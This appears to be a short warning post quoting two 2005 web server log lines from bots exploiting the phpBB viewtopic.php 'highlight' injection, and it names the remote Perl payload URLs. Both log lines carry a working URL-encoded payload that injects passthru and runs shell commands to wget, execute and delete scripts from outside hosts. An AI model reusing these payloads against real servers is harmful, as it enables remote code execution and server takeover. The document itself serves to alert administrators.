One of the phpBB exploit bots' source address
62.216.6.173 - - [16/Jan/2005:12:12:13 +0100] "GET /forum/viewtopic.php?t=675&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp;cd%20.temp;wget%20http://66.90.79.18/.zk/a.txt;wget%20http://66.90.79.18/.zk/ssh.txt;perl%20a.txt;rm%20a.txt;perl%20ssh.txt;rm%20ssh.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%5 4%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 28975 "-" "LWP:
imple/5.65"64.70.190.11 - - [16/Jan/2005:12:12:15 +0100] "GET /forum/viewtopic.php?t=944&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%4 8%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 26489 "-" "LWP:
imple/5.63"Pay attention to this:
http://www.quasi-sane.com/pics/bot.htm (can't access it but it's there)
http://weblicious.com/.notes/ssh2.htm (can see the perl script here with the source)
Script kiddies worldwide are using those two to hack phpBB forums via well known viewtopic.php.
